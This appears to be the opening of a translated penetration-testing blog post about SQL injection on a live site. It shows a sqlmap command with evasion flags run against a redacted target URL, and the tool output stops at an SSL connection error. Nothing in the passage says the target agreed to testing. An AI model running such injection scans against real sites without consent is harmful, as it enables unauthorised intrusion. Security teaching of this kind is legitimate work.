Preface
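With the rise of the security industry over the last few years and growing market attention, defensive security software has kept improving as well. It is no longer the case that you can pick a random site and find a vulnerability right away, and there are far fewer of the so-called "practice ranges" than there used to be. The SQL injection encountered in this engagement was a little different from others and required taking many things into account. Apologies to the experts for anything that is poorly written.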
Hands-on demonstration
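Initial information gathering turned up the following page with an injection point:
Running sqlmap against it directly produced the following error: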
python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.4.7#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:12:10 /2021-10-10/
[10.12.10] [INFO] parsing HTTP request from '49'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]Y
[10:12:10] [INFO] testing connection to the target URL
[10:12:10] [CRITICAL] can't establish SSL connection
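So sqlmap cannot establish an SSL connection. After finally finding an injection point, should we just give up like this? First, a quick Baidu search to look at how SSL certificates work; a single diagram makes it the most direct and clear to understand.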